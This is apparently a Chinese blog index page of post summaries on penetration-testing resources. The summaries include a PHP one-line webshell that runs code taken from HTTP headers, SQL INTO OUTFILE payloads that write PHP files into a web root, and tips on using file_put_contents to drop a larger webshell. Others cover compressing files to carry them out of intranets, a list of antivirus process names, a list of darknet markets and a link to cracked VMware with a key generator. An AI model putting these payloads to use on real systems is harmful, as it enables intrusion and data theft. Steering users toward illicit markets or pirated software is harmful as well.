随笔分类 -  资源分享

各类免费资源
摘要:环境函数用法 nginx get_defined_vars() 返回由所有已定义变量所组成的数组 apache getallheaders() 获取全部 HTTP 请求头信息 apache环境 1 2 3 <?php eval(next(getallheaders())); ?> 1 2 3 <?p 阅读全文
posted @ 2019-12-30 02:03 Hookjoy 阅读(511) 评论(0) 推荐(0) 编辑
摘要:子域名,旁站https://tools.ipip.net/ipdomain.php?ip=x.x.x.xhttps://cn.bing.com/search?q=ip:x.x.x.x Bing搜索https://api.hackertarget.com/reverseiplookup/?q=xxx. 阅读全文
posted @ 2019-09-05 22:39 Hookjoy 阅读(9716) 评论(1) 推荐(0) 编辑
摘要:windows操作系统事件日志 C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32) 应用程序日志 App Event.Evtx(Application.evtx) 安全日志 SecEvent.Evtx 系统日志 SysEvent.E 阅读全文
posted @ 2019-07-01 22:32 Hookjoy 阅读(2577) 评论(0) 推荐(0) 编辑
摘要:官网:http://web-console.org/ 这个脚本可以实现web下交互,也就是有了这玩意后可以不用反弹shell了。 阅读全文
posted @ 2019-06-15 22:19 Hookjoy 阅读(922) 评论(0) 推荐(0) 编辑
摘要:McAfeeFramework|McShield|McTaskManager|mfevtp|NIS|Updatesrv|VSSERV|iGateway|InoRPC|InoRT|InoTask|ccEvtMgr|ccSetMgr|DefWatch|SPBBCSvc|Symantec AntiViru 阅读全文
posted @ 2019-05-21 12:32 Hookjoy 阅读(4159) 评论(0) 推荐(1) 编辑
摘要:个人技术博客: 国内: http://blog.csdn.net/qq_27446553/ (qq_27446553博客) http://0x007.blog.51cto.com/6330498/1628943 (0x007博客) http://www.lorexxar.cn/(lorexxar博客 阅读全文
posted @ 2019-05-13 21:17 Hookjoy 阅读(3292) 评论(1) 推荐(1) 编辑
摘要:https://www.t00ls.net/thread-49742-1-1.html 阅读全文
posted @ 2019-02-01 22:09 Hookjoy 阅读(529) 评论(0) 推荐(0) 编辑
摘要:Ctrl-H 打开Find / Replace 对话框 Ctrl-D 复制当前行 Ctrl-L 删除当前行 Ctrl-T 上下行交换 F3 找下一个 Shift-F3 找上一个 Ctrl-Shift-F 在文件中找 Ctrl-F2 触发书签 F2 到前一个书签 Shift-F2 到下一个书签 F5 阅读全文
posted @ 2018-12-23 23:03 Hookjoy 阅读(371) 评论(0) 推荐(0) 编辑
只有注册用户登录后才能阅读该文。
posted @ 2018-07-28 00:17 Hookjoy 阅读(56) 评论(0) 推荐(0) 编辑
摘要:在内网渗透时,当没有rar、7z等压缩工具时候,拖取文件的时候为了防止流量过大,又必须压缩把文件压缩。当然你可以自己上传一个压缩工具。Windows自带制作压缩文件工具makecb你可以了解哈。压缩单文件makecab 1.doc 1.zip至于是压缩成zip、rar、cab看你个人喜欢解压命令ex 阅读全文
posted @ 2018-07-20 09:52 Hookjoy 阅读(12076) 评论(1) 推荐(0) 编辑
摘要:漏洞发布类http://exploit-db.comhttp://www.exploit-id.com/http://cve.mitre.org/http://www.securiteam.com/http://securityvulns.com/ (更新至2015.02.11)http://sec 阅读全文
posted @ 2018-04-01 23:04 Hookjoy 阅读(2154) 评论(0) 推荐(0) 编辑
摘要:1、select '' into outfile '/var/www/jumbo.php'; 2、select '' into dumpfile '/var/www/jumbo.php'; 3、Drop TABLE IF EXISTS temp;Create TABLE temp(cmd text NOT NULL);Insert INTO temp (cmd) VALUES('');Selec... 阅读全文
posted @ 2017-10-24 21:54 Hookjoy 阅读(3919) 评论(0) 推荐(0) 编辑
摘要:漏洞描述 【漏洞预警】Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏 https://www.secfree.com/article-395.html 漏洞作者 iswin from 360-sg-lab (360观星实验室) 漏洞等级 高 漏洞复现 阅读全文
posted @ 2017-09-21 11:53 Hookjoy 阅读(1758) 评论(0) 推荐(0) 编辑
摘要:sql注入lMySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结 SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名、字段名、库名高级SQL注入:混淆和绕过MSSQLMSSQL DBA权限获取WEBSHELL的过程 MSSQL 注入攻击 阅读全文
posted @ 2017-09-19 21:59 Hookjoy 阅读(2716) 评论(0) 推荐(5) 编辑
摘要:php这个函数不算冷门第一个参数是保存的文件名,如果已存在则报错停止第二个参数是内容,可以是字符串,也可以使用file_get_contents获取一个马子内容其实不算什么冷知识了,只是有时候一句话会被拦截,用这个会直接生成一个大马,而且本身是没有什么特征的除非杀软直接监控的文件写入,换个加密马就行 阅读全文
posted @ 2017-09-15 13:59 Hookjoy 阅读(365) 评论(0) 推荐(0) 编辑
摘要:Alphabay Dream Market Valhalla (Silkkitie) Hansa Market Outlaw Market Python Market Acropolis Market Silk Road 3.0 Tochka House Of Lions Zocalo Market 阅读全文
posted @ 2017-04-17 20:58 Hookjoy 阅读(3715) 评论(1) 推荐(0) 编辑
摘要:cPanel服务器默认的各主要目录及配置文件的路径。cPanel服务器很多配置文件的路径和通常情况下安装LAMP的不同,另外还有很多是属于cPanel面板自己的配置文件。 目录 目录 1 Apache 2 CPanel 3 WHM 4 Important CPanel/WHM files 5 PHP 阅读全文
posted @ 2017-04-15 01:27 Hookjoy 阅读(2419) 评论(0) 推荐(0) 编辑
摘要:腾讯金刚审计系统 http://service.security.tencent.com/kingkong 免费 无限制 腾讯御安全 http://yaq.qq.com/ 免费 查看漏洞详情需认证 阿里聚安全 http://jaq.alibaba.com/ 免费 查看漏洞详情需认证 360显微镜 h 阅读全文
posted @ 2017-04-02 11:04 Hookjoy 阅读(1171) 评论(0) 推荐(0) 编辑
摘要:Kali官方下载:http://cdimage.kali.org/kali-2016.2/kali-linux-2016.2-amd64.isoVM12 Pro下载:https://mega.nz/#!hUZGWbAY!2Li43 ... Yzx-1G5UKEJOlXqGBoo注册机:https:/ 阅读全文
posted @ 2016-09-26 00:40 Hookjoy 阅读(5557) 评论(0) 推荐(0) 编辑
摘要:Hack Forums: Hack Forums是目前最为理想的黑客技术学习根据地。该论坛不仅在设计上面向黑客群体,同时也适用于开发人员、博主、游戏开发者、程序员、图形设计师以及网络营销人士。 Evil Zone: Evil Zone是一个专门面向黑客群体的论坛。当然,其中也涉及科学、编程以及艺术等 阅读全文
posted @ 2016-06-01 02:28 Hookjoy 阅读(2752) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示